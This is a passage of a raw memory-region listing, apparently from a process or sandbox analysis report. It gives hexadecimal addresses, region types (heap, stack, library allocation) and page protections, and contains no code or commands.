22C26BC7000
heap
page read and write
258D3CA7000
heap
page read and write
1E07BEA0000
heap
page read and write
7FF7B3AF0000
trusted library allocation
page read and write
21B5F738000
heap
page read and write
23FDC63E000
heap
page read and write
1FC800C1000
trusted library allocation
page read and write
BBB673E000
stack
page read and write
288CCA08000
heap
page read and write
BC55EFB000
stack
page read and write
88BB5FE000
stack
page read and write
2F6E0BF000
stack
page read and write
22A5F050000
heap
page read and write
1C0CBE3F000
trusted library allocation
page read and write
1AF31000000
heap
page read and write
2276E00D000
heap
page read and write
14BF5FE000
stack
page read and write
23FDC312000
heap
page read and write
201876C7000
heap
page read and write
1C5156A7000
heap
page execute and read and write
4A375BC000
stack
page read and write
237B32E0000
heap
page execute and read and write
23FDA49B000
heap
page read and write
1EE96BD2000
heap
page read and write
258D3CC3000
heap
page read and write
E8B000
heap
page read and write
22A5D147000
heap
page read and write
212F3E27000
heap
page read and write
1EC84A81000
trusted library allocation
page read and write
180C2CFA000
heap
page read and write
1EE96E91000
heap
page read and write
1EC82C45000
heap
page read and write
288CCB28000
heap
page read and write
23FDC322000
heap
page read and write
180C4E3E000
heap
page read and write
7DF06F8000
stack
page read and write
237B33B0000
heap
page read and write
22D54891000
trusted library allocation
page read and write
D6C4FBE000
stack
page read and write
251FD756000
heap
page read and write
1F0D12D0000
heap
page read and write
20694530000
heap
page read and write
12EBBBD0000
trusted library allocation
page read and write
1EE96D0B000
heap
page read and write
1EC84E6C000
trusted library allocation
page read and write
203DCC70000
heap
page read and write
258D3DAF000
heap
page read and write
2159CB93000
heap
page read and write
2276E285000
heap
page read and write
180C4C3A000
heap
page read and write
180C470A000
heap
page read and write
196803CE000
trusted library allocation
page read and write
22D54E51000
trusted library allocation
page read and write
1E07B7C1000
heap
page read and write
7FF681B4C000
unkown
page readonly
1860000
heap
page read and write
2069466D000
heap
page read and write
2276DEA4000
heap
page read and write
21B614AB000
heap
page read and write
88BAFFE000
stack
page read and write
2276E285000
heap
page read and write
201876CF000
heap
page read and write
1EE94F30000
heap
page read and write
461CFE000
stack
page read and write
1EE96BC7000
heap
page read and write
22A5F039000
heap
page read and write
20187A0B000
heap
page read and write
7EB000
stack
page read and write
1608094B000
heap
page read and write
1F0D3261000
trusted library allocation
page read and write
577E000
stack
page read and write
180C46B4000
heap
page read and write
251FB67B000
heap
page read and write
2069467F000
heap
page read and write
C8071FE000
stack
page read and write
20694600000
heap
page read and write
7FF7B3B44000
trusted library allocation
page read and write
7DF0579000
stack
page read and write
12EBDA61000
trusted library allocation
page read and write
1EE96F3E000
heap
page read and write
202B20C2000
trusted library allocation
page read and write
23FDC40D000
heap
page read and write
20694663000
heap
page read and write
1EE96C0D000
heap
page read and write
2C445956000
heap
page execute and read and write
258D3A28000
heap
page read and write
180C4EFE000
heap
page read and write
7FF7B3800000
trusted library allocation
page read and write
288CCDB3000
heap
page read and write
AC0007E000
stack
page read and write
F256BFE000
stack
page read and write
251FD3D1000
heap
page read and write
2276E12C000
heap
page read and write
22C26CFA000
heap
page read and write
2159CD8A000
heap
page read and write
C30000
heap
page read and write
212F405E000
heap
page read and write
21B6151D000
heap
page read and write
D97797E000
stack
page read and write
16E6000
trusted library allocation
page execute and read and write
1D956070000
heap
page read and write
1C515986000
trusted library allocation
page read and write
1EE94DE7000
heap
page read and write
2159CC0E000
heap
page read and write
23FDA3B0000
heap
page read and write
237B18C0000
heap
page read and write
203DC9CF000
heap
page read and write
288CCA58000
heap
page read and write
22A5F061000
heap
page read and write
1EE988B000
stack
page read and write
214ABBCC000
trusted library allocation
page read and write
1C0C9A60000
heap
page read and write
2276BFB4000
heap
page read and write
2276E00F000
heap
page read and write
2159AD5B000
heap
page read and write
350F000
trusted library allocation
page read and write
237B3250000
trusted library allocation
page read and write
22A5F3FB000
heap
page read and write
22D54330000
heap
page read and write
206945F5000
heap
page read and write
1E07B7F2000
heap
page read and write
EEE0D7E000
stack
page read and write
1EE8CBE000
stack
page read and write
2817AFF000
stack
page read and write
16080AA5000
heap
page read and write
237B1948000
heap
page read and write
12751630000
heap
page read and write
182D1783000
heap
page read and write
201876A1000
heap
page read and write
288CAC66000
heap
page read and write
1EE96C91000
heap
page read and write
23FDC2C6000
heap
page read and write
22A5F198000
heap
page read and write
251FD51B000
heap
page read and write
2817CFD000
stack
page read and write
2159CF0E000
heap
page read and write
22A5F331000
heap
page read and write
2159CF4F000
heap
page read and write
22A5F032000
heap
page read and write
7FF7B3B10000
trusted library allocation
page read and write
1EE96F79000
heap
page read and write
1AF30EB2000
heap
page read and write
EEE0EF8000
stack
page read and write
22A5F032000
heap
page read and write
182D18A5000
heap
page read and write
203DE951000
trusted library allocation
page read and write
4A370FE000
stack
page read and write
1C0CBE14000
trusted library allocation
page read and write
288CCB7D000
heap
page read and write
173E5FE000
stack
page read and write
22A5F097000
heap
page read and write
2159CCC8000
heap
page read and write
791CAFF000
stack
page read and write
1EC863EA000
trusted library allocation
page read and write
203DED60000
trusted library allocation
page read and write
127516B6000
heap
page read and write
288CCA6D000
heap
page read and write
202B0747000
heap
page read and write
182D17D8000
heap
page read and write
251FD402000
heap
page read and write
2159CE86000
heap
page read and write
288CCDD3000
heap
page read and write
AC9B4FE000
stack
page read and write
2159CB99000
heap
page read and write
22C26C79000
heap
page read and write
1AF18CE0000
heap
page execute and read and write
160827FD000
trusted library allocation
page read and write
258D1AE4000
heap
page read and write
22D547C0000
heap
page execute and read and write
21701963000
trusted library allocation
page read and write
22D52943000
heap
page read and write
7FF7B3A00000
trusted library allocation
page read and write
22A5D0B0000
heap
page read and write
1E07B7FF000
heap
page read and write
3501000
trusted library allocation
page read and write
1D93BD9D000
heap
page read and write
180C470F000
heap
page read and write
180C4B88000
heap
page read and write
237B3C44000
trusted library allocation
page read and write
1E07B792000
heap
page read and write
2C445E59000
trusted library allocation
page read and write
20694658000
heap
page read and write
12EBD930000
heap
page execute and read and write
6B3ED79000
stack
page read and write
288CCB85000
heap
page read and write
288CCDBF000
heap
page read and write
1EC8614E000
trusted library allocation
page read and write
1F0D3488000
trusted library allocation
page read and write
212F3F1E000
heap
page read and write
2C443B50000
trusted library allocation
page read and write
1EE96E4B000
heap
page read and write
4A36E7F000
stack
page read and write
23FDA5B0000
heap
page read and write
1EE96F35000
heap
page read and write
7FF681BFD000
unkown
page read and write
D6C5B0F000
stack
page read and write
20187B3E000
heap
page read and write
D6C5B8E000
stack
page read and write
22D64881000
trusted library allocation
page read and write
1E07B7FA000
heap
page read and write
16C4000
trusted library allocation
page read and write
20187921000
heap
page read and write
20187903000
heap
page read and write
7FF7B39A1000
trusted library allocation
page read and write
182D18B8000
heap
page read and write
258D3CC3000
heap
page read and write
20187A31000
heap
page read and write
23FDC434000
heap
page read and write
212F3BA3000
heap
page read and write
D977B7E000
stack
page read and write
1EC82C5F000
heap
page read and write
288CCA23000
heap
page read and write
2069462F000
heap
page read and write
7DEFFEE000
stack
page read and write
12EBDAE1000
trusted library allocation
page read and write
251FD3B2000
heap
page read and write
1D955F50000
heap
page read and write
180C4DF3000
heap
page read and write
1AF19104000
trusted library allocation
page read and write
1D93BD7D000
heap
page read and write
23FDC65B000
heap
page read and write
237B3BA8000
trusted library allocation
page read and write
258D3CB0000
heap
page read and write
23FDC336000
heap
page read and write
251FD3D6000
heap
page read and write
D977F7C000
stack
page read and write
6B3EAFE000
stack
page read and write
180C46D1000
heap
page read and write
1D93E582000
trusted library allocation
page read and write
203DED35000
trusted library allocation
page read and write
251FD41B000
heap
page read and write
2C443BC0000
trusted library allocation
page read and write
1276B6A7000
heap
page execute and read and write
212F3C17000
heap
page read and write
251FD41E000
heap
page read and write
20187A4D000
heap
page read and write
2C443997000
heap
page read and write
206945DC000
heap
page read and write
2276E016000
heap
page read and write
23FDC3FD000
heap
page read and write
DBF000
stack
page read and write
1C5156C0000
heap
page execute and read and write
127538A8000
trusted library allocation
page read and write
7FF7B38F0000
trusted library allocation
page execute and read and write
6476CFF000
stack
page read and write
2C443C35000
heap
page read and write
22D528E5000
heap
page read and write
2276DEC7000
heap
page read and write
2F6DFFE000
stack
page read and write
19680222000
trusted library allocation
page read and write
1276B830000
heap
page execute and read and write
22D5289E000
heap
page read and write
22C26CB8000
heap
page read and write
20694682000
heap
page read and write
2159CF76000
heap
page read and write
C50000
heap
page read and write
1AF16FA1000
heap
page read and write
2C445960000
heap
page read and write
212F1FC0000
heap
page read and write
7FF7B3AF0000
trusted library allocation
page read and write
180C46E2000
heap
page read and write
1F0D2C20000
trusted library allocation
page read and write
180C46EF000
heap
page read and write
2276E139000
heap
page read and write
288CCB79000
heap
page read and write
1F0D39EC000
trusted library allocation
page read and write
20187681000
heap
page read and write
212F3BA1000
heap
page read and write
2C445E90000
trusted library allocation
page read and write
288CCB2D000
heap
page read and write
180C4BA8000
heap
page read and write
212F3BE3000
heap
page read and write
202B2848000
trusted library allocation
page read and write
23FDA3E0000
heap
page read and write
1F0D3180000
heap
page execute and read and write
7DF05F7000
stack
page read and write
22D54984000
trusted library allocation
page read and write
2159CBA4000
heap
page read and write
206945CE000
heap
page read and write
203DC9D3000
heap
page read and write
258D1B8C000
heap
page read and write
946737F000
stack
page read and write
2276E27D000
heap
page read and write
21B6162A000
heap
page read and write
180C4B51000
heap
page read and write
12751638000
heap
page read and write
2159CCD8000
heap
page read and write
1EC82EB0000
heap
page read and write
202B0704000
heap
page read and write
2159CF50000
heap
page read and write
1EE96F43000
heap
page read and write
53DD03E000
stack
page read and write
2159CF64000
heap
page read and write
237B3C90000
trusted library allocation
page read and write
258D3935000
heap
page read and write
251FD4A9000
heap
page read and write
21B61608000
heap
page read and write
212F3D1C000
heap
page read and write
251FD3F2000
heap
page read and write
BC558FE000
stack
page read and write
BBB61FE000
stack
page read and write
258D3946000
heap
page read and write
1C0CBAB9000
trusted library allocation
page read and write
23FDC33E000
heap
page read and write
F256AFD000
stack
page read and write
2276E277000
heap
page read and write
2276E292000
heap
page read and write
21B61728000
heap
page read and write
202B06FC000
heap
page read and write
202B2165000
heap
page read and write
6B3EF7E000
stack
page read and write
7FF7B3A40000
trusted library allocation
page read and write
212F3E2C000
heap
page read and write
7FF7B3A90000
trusted library allocation
page read and write
B88B9EF000
stack
page read and write
1D93BD85000
heap
page read and write
1EE8343000
stack
page read and write
258D3A75000
heap
page read and write
206945CF000
heap
page read and write
541E000
stack
page read and write
288CCDD3000
heap
page read and write
288CCA74000
heap
page read and write
2159CE90000
heap
page read and write
1E07BCA0000
heap
page read and write
1AF30E70000
heap
page read and write
1EE96E21000
heap
page read and write
53DD0B8000
stack
page read and write
180C4B6D000
heap
page read and write
1F0D366F000
trusted library allocation
page read and write
1E079CC7000
heap
page read and write
21B5F7EA000
heap
page read and write
946783E000
stack
page read and write
22A5F330000
heap
page read and write
1D94DD6B000
trusted library allocation
page read and write
44D18FE000
stack
page read and write
251FD41E000
heap
page read and write
BC55E7E000
stack
page read and write
1E079D65000
heap
page read and write
1D93BDBB000
heap
page read and write
D6C4D79000
stack
page read and write
23FDA5D5000
heap
page read and write
23FDC77E000
heap
page read and write
203DE940000
heap
page execute and read and write
2018779D000
heap
page read and write
1AF190D8000
trusted library allocation
page read and write
2276DED2000
heap
page read and write
BBB67BF000
stack
page read and write
19680619000
trusted library allocation
page read and write
7FF7B3A10000
trusted library allocation
page read and write
1E07BD08000
heap
page read and write
94675BC000
stack
page read and write
202B2040000
trusted library allocation
page read and write
1F0D2D20000
heap
page read and write
214A9C00000
heap
page read and write
206945CF000
heap
page read and write
180C4BBB000
heap
page read and write
21B6173C000
heap
page read and write
288CCD93000
heap
page read and write
22A5F168000
heap
page read and write
237B3BAC000
trusted library allocation
page read and write
16082680000
heap
page read and write
7FF7B3B70000
trusted library allocation
page read and write
20187913000
heap
page read and write
180C2D40000
heap
page read and write
7FF7B38E0000
trusted library allocation
page execute and read and write
180C2D16000
heap
page read and write
B88B96F000
stack
page read and write
288CCD9B000
heap
page read and write
12753564000
trusted library allocation
page read and write
1AF1A078000
trusted library allocation
page read and write
1F0D2C00000
trusted library allocation
page read and write
1EE96D1A000
heap
page read and write
745AEFB000
stack
page read and write
1EE96E26000
heap
page read and write
251FD7A0000
heap
page read and write
37796FE000
stack
page read and write
1C515220000
trusted library allocation
page read and write
2276E285000
heap
page read and write
2276DEA0000
heap
page read and write
251FD3A2000
heap
page read and write
12EBE09A000
trusted library allocation
page read and write
38D6B3B000
stack
page read and write
21B61884000
heap
page read and write
1FC80619000
trusted library allocation
page read and write
22A5F22C000
heap
page read and write
23FDC2D6000
heap
page read and write
22A5F3E6000
heap
page read and write
21B6175B000
heap
page read and write
21701CAF000
trusted library allocation
page read and write
203DC9EF000
heap
page read and write
37797F9000
stack
page read and write
1E07B7E2000
heap
page read and write
12753070000
trusted library allocation
page read and write
21B6151D000
heap
page read and write
21B615D8000
heap
page read and write
1E07BEA1000
heap
page read and write
1EE96CCD000
heap
page read and write
2276DF1D000
heap
page read and write
2276E128000
heap
page read and write
94673FE000
stack
page read and write
38D647F000
stack
page read and write
2276E292000
heap
page read and write
12752FF0000
heap
page readonly
2159CBBA000
heap
page read and write
258D1E20000
heap
page read and write
173F48E000
stack
page read and write
1D93BD60000
heap
page read and write
288CCA0C000
heap
page read and write
214ABC7C000
trusted library allocation
page read and write
251FB692000
heap
page read and write
1E07B7A4000
heap
page read and write
1AF28D65000
trusted library allocation
page read and write
202B0690000
heap
page read and write
20187902000
heap
page read and write
20694655000
heap
page read and write
21B61507000
heap
page read and write
22D52840000
heap
page read and write
180C4E0B000
heap
page read and write
182D18AD000
heap
page read and write
23FDC68E000
heap
page read and write
201877FA000
heap
page read and write
1E07B80D000
heap
page read and write
21B614A1000
heap
page read and write
1EE94DE4000
heap
page read and write
C80670A000
stack
page read and write
21B6150A000
heap
page read and write
1AF19308000
trusted library allocation
page read and write
1E07BFA1000
heap
page read and write
20187A0C000
heap
page read and write
2159CF50000
heap
page read and write
12EBDE30000
trusted library allocation
page read and write
1EC82EF5000
heap
page read and write
22A5F17D000
heap
page read and write
22D64891000
trusted library allocation
page read and write
20187A4D000
heap
page read and write
22A5F141000
heap
page read and write
1E07B803000
heap
page read and write
12753080000
heap
page execute and read and write
258D3A5D000
heap
page read and write
12EBB8D0000
heap
page read and write
251FD59A000
heap
page read and write
1E07BCD8000
heap
page read and write
258D3CA7000
heap
page read and write
201876EF000
heap
page read and write
251FD74B000
heap
page read and write
19680411000
trusted library allocation
page read and write
180C4DDB000
heap
page read and write
791C6FF000
stack
page read and write
288CCB45000
heap
page read and write
1C0CB506000
heap
page read and write
201877B8000
heap
page read and write
160827B1000
trusted library allocation
page read and write
258D3C8B000
heap
page read and write
258D38F0000
heap
page read and write
1E07B950000
heap
page read and write
180C4B98000
heap
page read and write
258D3960000
heap
page read and write
1EC82BB0000
heap
page read and write
12EBDF3C000
trusted library allocation
page read and write
50398F5000
stack
page read and write
13BA000
heap
page read and write
1E07BD9A000
heap
page read and write
21B61884000
heap
page read and write
180C471D000
heap
page read and write
1EE96BE2000
heap
page read and write
1D93DD01000
trusted library allocation
page read and write
258D3949000
heap
page read and write
206945E0000
heap
page read and write
237B3B9A000
trusted library allocation
page read and write
1C0CBA31000
trusted library allocation
page read and write
20187A4D000
heap
page read and write
377977E000
stack
page read and write
22C26B7B000
heap
page read and write
22A5F175000
heap
page read and write
2276E285000
heap
page read and write
7FF7B3AC0000
trusted library allocation
page read and write
173E8BE000
stack
page read and write
2276DFC8000
heap
page read and write
22C26BB7000
heap
page read and write
1E07BCB1000
heap
page read and write
180C471E000
heap
page read and write
2F6EE8E000
stack
page read and write
1F0D3291000
trusted library allocation
page read and write
20187A0B000
heap
page read and write
21B6174E000
heap
page read and write
1D93D750000
heap
page read and write
23FDC3D1000
heap
page read and write
1276B5A3000
heap
page read and write
2276DEF7000
heap
page read and write
202B0665000
heap
page read and write
22A5F3C3000
heap
page read and write
94674F9000
stack
page read and write
212F3CD8000
heap
page read and write
21B6151D000
heap
page read and write
1EC84E68000
trusted library allocation
page read and write
1EC82C09000
heap
page read and write
23FDC4BA000
heap
page read and write
1AF19678000
trusted library allocation
page read and write
6B3EFFF000
stack
page read and write
7FF7B39E0000
trusted library allocation
page read and write
37795FD000
stack
page read and write
237B18FF000
heap
page read and write
21B615ED000
heap
page read and write
461A73000
stack
page read and write
2C443910000
heap
page read and write
1FC803E8000
trusted library allocation
page read and write
22A5ECE0000
heap
page read and write
16080A60000
heap
page read and write
1C513825000
heap
page read and write
2159CF77000
heap
page read and write
1C0CB930000
heap
page execute and read and write
2159AEC5000
heap
page read and write
1C515256000
heap
page read and write
251FD4BD000
heap
page read and write
12EBDA50000
heap
page read and write
21B61884000
heap
page read and write
21710011000
trusted library allocation
page read and write
2276E21E000
heap
page read and write
7DEFF23000
stack
page read and write
237B3BEA000
trusted library allocation
page read and write
12763450000
trusted library allocation
page read and write
2817DFE000
stack
page read and write
2069465D000
heap
page read and write
23FDC41D000
heap
page read and write
2159CCD5000
heap
page read and write
2159CF64000
heap
page read and write
288CCDD3000
heap
page read and write
1E07BF5F000
heap
page read and write
53DDD8E000
stack
page read and write
1AF190C9000
trusted library allocation
page read and write
2159ACA0000
heap
page read and write
20187781000
heap
page read and write
22C26C8D000
heap
page read and write
214ABC82000
trusted library allocation
page read and write
288CCA38000
heap
page read and write
1EC82E40000
heap
page readonly
1EE887E000
stack
page read and write
1EC84A50000
heap
page execute and read and write
12753451000
trusted library allocation
page read and write
214ABBFF000
trusted library allocation
page read and write
212F3C1E000
heap
page read and write
201876C2000
heap
page read and write
203DCB90000
trusted library allocation
page read and write
127516B2000
heap
page read and write
201877C8000
heap
page read and write
258D3CF1000
heap
page read and write
7FF7B37F4000
trusted library allocation
page read and write
258D3968000
heap
page read and write
7FF7B39C0000
trusted library allocation
page execute and read and write
1D93DE3B000
trusted library allocation
page read and write
212F3BCC000
heap
page read and write
22A5F0AE000
heap
page read and write
1C513820000
heap
page read and write
2D87000
trusted library allocation
page read and write
12752FE0000
heap
page read and write
2159CBC1000
heap
page read and write
BBB730E000
stack
page read and write
2159CBFA000
heap
page read and write
212F3CE8000
heap
page read and write
946753E000
stack
page read and write
214AC08C000
trusted library allocation
page read and write
22D5497A000
trusted library allocation
page read and write
53DCEFE000
stack
page read and write
1EE94FB0000
heap
page read and write
22A5F092000
heap
page read and write
206945DC000
heap
page read and write
201876B1000
heap
page read and write
212F3F6D000
heap
page read and write
7FF7B3AD0000
trusted library allocation
page read and write
7FF7B3AE0000
trusted library allocation
page read and write
22D52AD0000
heap
page read and write
288CCDB4000
heap
page read and write
1EC82EF0000
heap
page read and write
22A5F082000
heap
page read and write
2069462F000
heap
page read and write
180C4B5D000
heap
page read and write
2276DF1D000
heap
page read and write
22D52810000
heap
page read and write
288CCA33000
heap
page read and write
202B0708000
heap
page read and write
B88BF3F000
stack
page read and write
2159ACC8000
heap
page read and write
203DCA78000
heap
page read and write
22A5F031000
heap
page read and write
23FDC33E000
heap
page read and write
1FC803EC000
trusted library allocation
page read and write
1275167B000
heap
page read and write
251FD4F8000
heap
page read and write
D6C4B7D000
stack
page read and write
1490000
heap
page read and write
2C445E5B000
trusted library allocation
page read and write
21B614F2000
heap
page read and write
180C4E41000
heap
page read and write
258D3C9E000
heap
page read and write
1E07B795000
heap
page read and write
212F3BF3000
heap
page read and write
AC9B3FD000
stack
page read and write
2159CF40000
heap
page read and write
12EBB950000
trusted library allocation
page read and write
23FDC68E000
heap
page read and write
1C0CC1B6000
trusted library allocation
page read and write
2159CCBD000
heap
page read and write
182D1762000
heap
page read and write
21B614A4000
heap
page read and write
EEE0CFD000
stack
page read and write
1EC85E33000
trusted library allocation
page read and write
21B6184F000
heap
page read and write
160828BE000
trusted library allocation
page read and write
21B5F746000
heap
page read and write
28177FE000
stack
page read and write
CAB2FFF000
stack
page read and write
1E07B796000
heap
page read and write
20187981000
heap
page read and write
203DC999000
heap
page read and write
182D18D9000
heap
page read and write
2276E139000
heap
page read and write
EF1EEFF000
stack
page read and write
214ABC86000
trusted library allocation
page read and write
180C4E0B000
heap
page read and write
2C445E94000
trusted library allocation
page read and write
258D39F9000
heap
page read and write
2F6E3BE000
stack
page read and write
1609A875000
heap
page read and write
7FF7B37DB000
trusted library allocation
page read and write
12753CD6000
trusted library allocation
page read and write
2159CF23000
heap
page read and write
1EC82CEF000
heap
page read and write
3FC11FB000
stack
page read and write
1EE96F2B000
heap
page read and write
1D93BF50000
heap
page read and write
2159CD8A000
heap
page read and write
12EBDF0D000
trusted library allocation
page read and write
182D1861000
heap
page read and write
14B5000
heap
page read and write
7FF7B38A6000
trusted library allocation
page execute and read and write
1D93DCF1000
trusted library allocation
page read and write
21B617A1000
heap
page read and write
7FF6819E0000
unkown
page readonly
1EC860A5000
trusted library allocation
page read and write
214A9AC0000
heap
page read and write
1890000
trusted library allocation
page read and write
217018DD000
trusted library allocation
page read and write
288CAB65000
heap
page read and write
1AF1A3E0000
trusted library allocation
page read and write
94672FD000
stack
page read and write
2276E016000
heap
page read and write
196803D9000
trusted library allocation
page read and write
2276E15B000
heap
page read and write
21B5F8C5000
heap
page read and write
214A9CBE000
heap
page read and write
AC9ACFA000
stack
page read and write
7FF7B3890000
trusted library allocation
page execute and read and write
1EC84A10000
trusted library allocation
page read and write
22A5F061000
heap
page read and write
2276DFAC000
heap
page read and write
214ABC89000
trusted library allocation
page read and write
2276DF0A000
heap
page read and write
3190000
trusted library allocation
page read and write
2159CC06000
heap
page read and write
201877AD000
heap
page read and write
1FC8062F000
trusted library allocation
page read and write
2276C205000
heap
page read and write
180C46A9000
heap
page read and write
201877FC000
heap
page read and write
20187B3E000
heap
page read and write
21B614E2000
heap
page read and write
2018582B000
heap
page read and write
1AF1947C000
trusted library allocation
page read and write
1E07B7A2000
heap
page read and write
202B0620000
heap
page read and write
20187A5E000
heap
page read and write
1E079BE0000
heap
page read and write
22C26BED000
heap
page read and write
22C26B74000
heap
page read and write
7FF7B37CD000
trusted library allocation
page execute and read and write
180C47F0000
heap
page read and write
7FF7B3B00000
trusted library allocation
page read and write
1FC80413000
trusted library allocation
page read and write
160808F8000
heap
page read and write
461C7D000
stack
page read and write
203DEF70000
trusted library allocation
page read and write
7FF7B3AC0000
trusted library allocation
page read and write
22A5F0AB000
heap
page read and write
2159CD8A000
heap
page read and write
2276E13C000
heap
page read and write
173E3FF000
stack
page read and write
21B6161D000
heap
page read and write
251FD73B000
heap
page read and write
2159AC60000
heap
page read and write
1E07BF72000
heap
page read and write
288CCB05000
heap
page read and write
22A5D15D000
heap
page read and write
288CAB60000
heap
page read and write
22A5F05A000
heap
page read and write
22C26CFA000
heap
page read and write
22A5D120000
heap
page read and write
1E07BD9A000
heap
page read and write
21B615E5000
heap
page read and write
251FD696000
heap
page read and write
160828D5000
trusted library allocation
page read and write
6B3E7AF000
stack
page read and write
22A5F087000
heap
page read and write
173F50D000
stack
page read and write
BBB65B9000
stack
page read and write
288CAB90000
heap
page read and write
180C4B9D000
heap
page read and write
21B614D7000
heap
page read and write
180C4C3A000
heap
page read and write
2276BFA7000
heap
page read and write
BC55AFE000
stack
page read and write
D977D7B000
stack
page read and write
1AF17036000
heap
page read and write
1EE96BB2000
heap
page read and write
20187A40000
heap
page read and write
7FF6819E0000
unkown
page readonly
2159CBFF000
heap
page read and write
1D93BD50000
heap
page read and write
2276E2A1000
heap
page read and write
251FD41D000
heap
page read and write
7FF7B3A30000
trusted library allocation
page read and write
3779A3E000
stack
page read and write
237B3C33000
trusted library allocation
page read and write
7FF7B382C000
trusted library allocation
page execute and read and write
212F3E57000
heap
page read and write
2F6E43C000
stack
page read and write
2276DEF2000
heap
page read and write
2276E1A0000
heap
page read and write
212F3E57000
heap
page read and write
12EBBB50000
heap
page readonly
22A5F042000
heap
page read and write
16080AA0000
heap
page read and write
1EC82C85000
heap
page read and write
551E000
stack
page read and write
16C3000
trusted library allocation
page execute and read and write
258D3A1D000
heap
page read and write
7FF7B3B20000
trusted library allocation
page read and write
22D52AD5000
heap
page read and write
2F6E33F000
stack
page read and write
23FDC333000
heap
page read and write
1E07B80E000
heap
page read and write
1EE96B91000
heap
page read and write
201876EA000
heap
page read and write
1AF30CFA000
heap
page read and write
2C44609A000
trusted library allocation
page read and write
22A5F22A000
heap
page read and write
212F3E22000
heap
page read and write
201876A6000
heap
page read and write
2276C062000
heap
page read and write
20185740000
heap
page read and write
2276E292000
heap
page read and write
1EC86363000
trusted library allocation
page read and write
53DCCFF000
stack
page read and write
2276DFE8000
heap
page read and write
21B5F8C0000
heap
page read and write
206945CF000
heap
page read and write
206945F5000
heap
page read and write
2159CF64000
heap
page read and write
1E07B7C6000
heap
page read and write
180C2C7E000
heap
page read and write
D97787F000
stack
page read and write
182D18D8000
heap
page read and write
21B61728000
heap
page read and write
180C4716000
heap
page read and write
EF1ECFA000
stack
page read and write
2276E250000
heap
page read and write
953C73A000
stack
page read and write
180C46CA000
heap
page read and write
1EE8A37000
stack
page read and write
251FD75F000
heap
page read and write
180C46A9000
heap
page read and write
53DDE0E000
stack
page read and write
D977BF8000
stack
page read and write
2C4459EE000
heap
page read and write
202B06FA000
heap
page read and write
7FF7B38B6000
trusted library allocation
page execute and read and write
BC559FE000
stack
page read and write
1EE96E22000
heap
page read and write
202B0640000
heap
page read and write
214AC02D000
trusted library allocation
page read and write
258D3CA3000
heap
page read and write
2C4459CF000
heap
page read and write
160808A0000
heap
page read and write
1AF18F19000
trusted library allocation
page read and write
2018582B000
heap
page read and write
2276DFCD000
heap
page read and write
22D528A4000
heap
page read and write
288CCA13000
heap
page read and write
7FF7B38D6000
trusted library allocation
page execute and read and write
1AF1A3B8000
trusted library allocation
page read and write
1AF311D6000
heap
page read and write
7FF7B3B40000
trusted library allocation
page read and write
1EE96CC8000
heap
page read and write
53DD23E000
stack
page read and write
2276DF1E000
heap
page read and write
7FF7B3AC0000
trusted library allocation
page read and write
288CCDAE000
heap
page read and write
202B2080000
heap
page read and write
20694664000
heap
page read and write
22A5F22A000
heap
page read and write
21B6151C000
heap
page read and write
20694655000
heap
page read and write
258D3935000
heap
page read and write
212F1C30000
heap
page read and write
258D38F2000
heap
page read and write
531E000
stack
page read and write
1C0CC1BF000
trusted library allocation
page read and write
258D3939000
heap
page read and write
1E07B7E2000
heap
page read and write
1E07B7B6000
heap
page read and write
7FF7B3A70000
trusted library allocation
page read and write
1EE96BE2000
heap
page read and write
180C4D40000
heap
page read and write
1D93DDF7000
trusted library allocation
page read and write
288CCB7A000
heap
page read and write
258D3946000
heap
page read and write
22A5F0AE000
heap
page read and write
212F3CE5000
heap
page read and write
BBB728E000
stack
page read and write
4EBE000
stack
page read and write
251FD750000
heap
page read and write
214A9C60000
trusted library allocation
page read and write
20185835000
heap
page read and write
1EE96D1A000
heap
page read and write
288CCA48000
heap
page read and write
12763441000
trusted library allocation
page read and write
2159CC0E000
heap
page read and write
173F40E000
stack
page read and write
12EBDF48000
trusted library allocation
page read and write
21710300000
trusted library allocation
page read and write
20187691000
heap
page read and write
160808E0000
trusted library allocation
page read and write
38D667F000
stack
page read and write
2159CF47000
heap
page read and write
1EE96E29000
heap
page read and write
CBE000
stack
page read and write
37794FF000
stack
page read and write
2C445A70000
heap
page read and write
953D3FB000
stack
page read and write
1EE8C3E000
stack
page read and write
23FDC653000
heap
page read and write
180C4DBE000
heap
page read and write
1E07BCDD000
heap
page read and write
180C4DE9000
heap
page read and write
212F3D25000
heap
page read and write
2276E12E000
heap
page read and write
173EA3C000
stack
page read and write
BBB6479000
stack
page read and write
21B6162A000
heap
page read and write
2276E02A000
heap
page read and write
22A5F22A000
heap
page read and write
22C26BDF000
heap
page read and write
251FD40A000
heap
page read and write
BBB60FE000
stack
page read and write
EEE1C4E000
stack
page read and write
173E2FF000
stack
page read and write
258D3903000
heap
page read and write
BBB6073000
stack
page read and write
20187913000
heap
page read and write
288CCA53000
heap
page read and write
6B3ECFE000
stack
page read and write
1EE96CD8000
heap
page read and write
212F3CE8000
heap
page read and write
2276DFA9000
heap
page read and write
237B3C6F000
trusted library allocation
page read and write
22A5D0C0000
heap
page read and write
14BF4FF000
stack
page read and write
251FD3F2000
heap
page read and write
2159CBC1000
heap
page read and write
23FDC408000
heap
page read and write
1AF188C6000
heap
page read and write
2159CF64000
heap
page read and write
288CCA28000
heap
page read and write
5790000
heap
page read and write
206945F5000
heap
page read and write
53DCC7F000
stack
page read and write
1AF30EBF000
heap
page read and write
20694659000
heap
page read and write
212F3F6D000
heap
page read and write
1EE96E39000
heap
page read and write
201876B1000
heap
page read and write
180C4DEF000
heap
page read and write
288CABC4000
heap
page read and write
288CCB79000
heap
page read and write
22A5F3D9000
heap
page read and write
251FB520000
heap
page read and write
16080A00000
trusted library allocation
page read and write
53DCFF9000
stack
page read and write
19680001000
trusted library allocation
page read and write
21710077000
trusted library allocation
page read and write
2276E02A000
heap
page read and write
20187A80000
heap
page read and write
251FD3A6000
heap
page read and write
2159CBDF000
heap
page read and write
2C44394C000
heap
page read and write
745B9CD000
stack
page read and write
212F3C1D000
heap
page read and write
21B61884000
heap
page read and write
182D17A8000
heap
page read and write
B50000
heap
page read and write
160927C0000
trusted library allocation
page read and write
212F3C1E000
heap
page read and write
217016A3000
trusted library allocation
page read and write
2069468F000
heap
page read and write
1EE96E3E000
heap
page read and write
21B6162A000
heap
page read and write
23FDC43B000
heap
page read and write
2159CF3B000
heap
page read and write
1AF30E60000
heap
page execute and read and write
2276DFD8000
heap
page read and write
1EC84E8F000
trusted library allocation
page read and write
88BB0FE000
stack
page read and write
20187A5E000
heap
page read and write
1F0D2BC0000
heap
page read and write
21B6151E000
heap
page read and write
2159CF4E000
heap
page read and write
251FB750000
heap
page read and write
745A87F000
stack
page read and write
180C2C40000
heap
page read and write
251FD519000
